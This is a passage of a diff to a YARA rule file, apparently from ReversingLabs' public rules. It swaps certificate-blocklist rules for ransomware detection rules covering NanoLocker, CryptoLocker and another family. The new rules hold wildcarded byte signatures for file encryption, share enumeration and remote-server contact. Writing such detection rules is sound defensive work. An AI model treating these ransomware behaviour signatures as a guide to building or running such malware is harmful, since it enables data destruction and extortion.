?? ?? + 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? + ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? + 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 55 ?? 52 8B 45 ?? + 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E9 + } + $encrypt_files_p3 = { + 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? + ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 + FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? + ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D + ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A + ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 50 8B 45 ?? 50 FF 15 ?? ?? + ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B + 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? + 8D 45 ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? + ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? + 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 6A ?? + 68 ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68 + } + $encrypt_files_p4 = { + 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? EB ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 87 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 75 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 69 55 ?? ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? + ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B + 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? + ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? + ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 51 6A + ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? + 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ?? + 51 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D ?? 51 FF + 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A + ?? 69 45 ?? ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? + ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? + ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? + 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 + ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 + } + $encrypt_files_p5 = { + E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8A 0D ?? ?? ?? ?? 88 4D ?? 33 D2 89 55 + ?? 89 55 ?? 89 55 ?? 89 55 ?? 88 55 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? + ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 33 C9 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 + 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? + ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? + ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? + 83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 45 ?? 50 8D 4D ?? + 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? + 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 + ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? + 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? + ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8B 4D + ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B + } + $encrypt_files_p6 = { + 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ?? + 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D + ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ?? + ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13 45 + ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? + ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? + ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? + ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? + 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? + ?? B8 ?? ?? ?? ?? EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 55 ?? + 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D + ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8 + ?? ?? ?? ?? 8B E5 5D C3 + } + $remote_connection = { + 55 8B EC 81 EC ?? ?? ?? ?? 8B 45 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? + 89 45 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? + ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? E8 + ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? EB ?? 8B 4D ?? 8B 51 ?? + 89 55 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? C7 45 ?? ?? ?? ?? + ?? 8B 4D ?? 8B 51 ?? 89 55 ?? EB ?? 8B 45 ?? 8B 48 ?? 89 4D ?? 83 7D ?? ?? 0F 84 ?? + ?? ?? ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? 51 E8 ?? + ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? + ?? ?? ?? 6B D1 ?? 8D 8C 15 ?? ?? ?? ?? 3B C1 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? + 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? + ?? ?? 8D 55 ?? 89 55 ?? 8D 45 ?? 50 8B 4D ?? 0F B6 51 ?? 52 E8 + } + $find_files_p1 = { + 8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B + 7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? + 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? + ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F + 5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? + ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ?? + 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ?? + ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ?? + 8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ?? + 8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7 + } + $find_files_p2 = { + EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 + 57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ?? + ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD + 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 + ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? + ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D + ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 + ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? + 83 C4 ?? E9 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Calibration Consultants" and pe.signatures[i].serial=="6b:6d:ae:f5:be:29:f2:0d:dc:e4:b0:f5:e9:fa:6e:a5" and 1280447999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_57D6Dff1Ef96F01B9430666B2733Cc87 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Nanolocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects NanoLocker ransomware." author = "ReversingLabs" - id = "c20b81a1-7331-57a9-9daf-007ec516a473" - date = "2023-11-08" - modified = "2023-11-08" + id = "a31dad2e-2738-527b-a6e9-322757e2ec30" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2542-L2558" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "40d22137e9c5345859c5f000166da2a3117bcfcc19b4c5e81083cad80dfa6ee4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.NanoLocker.yara#L1-L79" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7fdb021f22d97bf8a00fd856ef913695a0d6fbaad1138b5a5cc2cc8768b130be" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "NanoLocker" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_file_1 = { + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 + ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 05 ?? ?? ?? ?? ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 + 05 ?? ?? ?? ?? ?? 8D 3D ?? ?? ?? ?? 33 C9 C6 07 ?? 47 41 81 F9 ?? ?? ?? ?? 75 ?? C7 + 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A + ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A + ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? + ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 81 3D + ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8 + ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 F0 46 8A 06 3C ?? 0F 85 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 + } + $encrypt_file_2 = { + A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 + ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 81 3D ?? ?? ?? ?? + ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? + E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? + ?? ?? ?? 2D ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? A3 ?? + ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? + ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? + ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? + ?? ?? ?? E8 + } + $remote_server_1 = { + E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? + ?? ?? 83 F8 ?? 72 ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF + 35 ?? ?? ?? ?? E8 + } + $remote_server_2 = { + E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 68 ?? + ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 + } + $enum_shares_and_encrypt_files = { + E8 ?? ?? ?? ?? C1 C8 ?? BA ?? ?? ?? ?? 23 D0 60 83 FA ?? 75 ?? 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? 8D 35 ?? ?? ?? ?? 60 68 ?? ?? ?? ?? 56 68 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 61 8A 06 46 0A C0 75 ?? 8A 06 0A C0 75 ?? 61 D1 C8 8A 1D ?? + ?? ?? ?? FE C3 88 1D ?? ?? ?? ?? 80 FB ?? 76 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? + ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Smart Plugin Ltda" and pe.signatures[i].serial=="57:d6:df:f1:ef:96:f0:1b:94:30:66:6b:27:33:cc:87" and 1314575999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $remote_server_1 and $remote_server_2 and $enum_shares_and_encrypt_files } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0166B65038D61E5435B48204Cae4795A : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Cryptolocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects CryptoLocker ransomware." author = "ReversingLabs" - id = "04bdefc5-ee4e-5a46-94d6-e3a5d8b56ce0" - date = "2023-11-08" - modified = "2023-11-08" + id = "8cc3ac4b-9179-5e2c-97e1-65304f9dfe22" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2560-L2576" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4e289eda4d5381250bcd6e36daade6f1e1803b6d16578d7eaee4454cef6981d0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.CryptoLocker.yara#L3-L154" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "08430b0c5689840d592bdda5dbc2ed06e0d0fa1e2c0f19aff4316580c6a0b23d" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "CryptoLocker" + tc_detection_factor = 5 importance = 25 + strings: + $file_loop_1 = { + 55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 45 01 + 00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ?? + ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 75 ?? + 6A ?? 8B 49 ?? 6A ?? 52 56 8B 01 6A ?? 89 55 ?? 8B 00 FF D0 84 C0 0F 84 E6 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 D2 89 + 45 ?? 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73 + 0F 8B 45 ?? 8D 0C 13 8B 40 ?? 88 0C 02 42 EB CC 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 6B 85 DB 77 0E 72 08 81 FF ?? ?? ?? + ?? 73 04 8B F7 EB 05 BE ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ?? ?? ?? ?? 85 C0 74 ?? + 39 75 ?? 75 ?? 8B 45 ?? 2B FE 8B 55 ?? 83 DB ?? 2B D7 8B 48 ?? 8B 45 ?? 1B C3 50 8B 31 52 FF 75 ?? FF 75 ?? 8B 06 6A ?? + FF D0 84 C0 74 34 85 DB 77 AD 72 04 85 FF 75 95 8B 5D ?? FF 33 FF 15 ?? ?? ?? 